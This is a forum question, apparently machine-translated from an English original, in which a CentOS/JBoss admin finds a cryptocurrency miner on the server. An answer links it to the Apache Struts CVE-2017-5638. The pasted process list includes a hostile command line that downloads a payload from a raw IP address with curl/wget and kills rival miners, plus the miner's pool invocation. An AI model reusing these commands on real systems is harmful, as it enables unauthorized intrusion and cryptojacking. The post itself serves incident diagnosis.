在过去的几天里,我在服务器上发现了我服务器上的可疑运行进程。
jboss 23276 0.0 0.0 113108 644 ? S 04:25 0:00 /bin/bash -c cd /tmp; rm yam; pkill -9 yam; pkill -9 minergate-cli;curl -ks http://107.155.106.174/t/5tf-1478613950.txt > yam || (wget https://107.155.106.174/t/5tf-1478613950.txt --no-check-certifica
jboss 23277 374 0.1 424456 35600 ? Sl 04:25 2880:22 ./yam --mining-params xmr:av=0&donation-interval=50 -c x -M stratum+tcp://dxzgadfgsdfgsdfgsdfgsdfgwerjukQdysdddRFch2CGykmqWUJPJW2hf23AaJWXmEPe96xYyYVDGn7qN:x@xmr-usa.dwarfpool.com:9050/
我在互联网上搜索,似乎有人正在使用我的服务器作为比特币挖掘的计算节点。所以有人设法上传并在我的服务器上运行它。据我所知,无法访问密码,只能在Linux用户jboss上执行此操作,我的jboss应用程序也在此用户下运行。
作为一种快速解决方案,我在tmp文件夹中创建了一个与root名称相同的文件,因此无法覆盖它。此外,如果包含某些进程参数的进程正在运行,我也会运行一个脚本来检查每一分钟。
我想找到这个问题的根源。 jboss管理控制台已停用。
BTW:我的服务器运行Centos 7和java版本" 1.7.0_79"。
答案 0 :(得分:1)
您可能会遇到与我们服务器上相同的问题。
关于Apache Struts中的漏洞,请查看此https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638和此https://cwiki.apache.org/confluence/display/WW/S2-045
在我们的案例中,有人正在挖掘并尝试获取有关操作系统的一些信息(SSH版本,Os系列,用户......)。幸运的是,我们在专用帐户下运行应用程序,没有任何公共访问端口(攻击滥用代理应用程序)。但是你应该检查一些日志并查看一些“multipart / form-data”(在我们的例子中)
grep -r -ni 'multipart/form-data'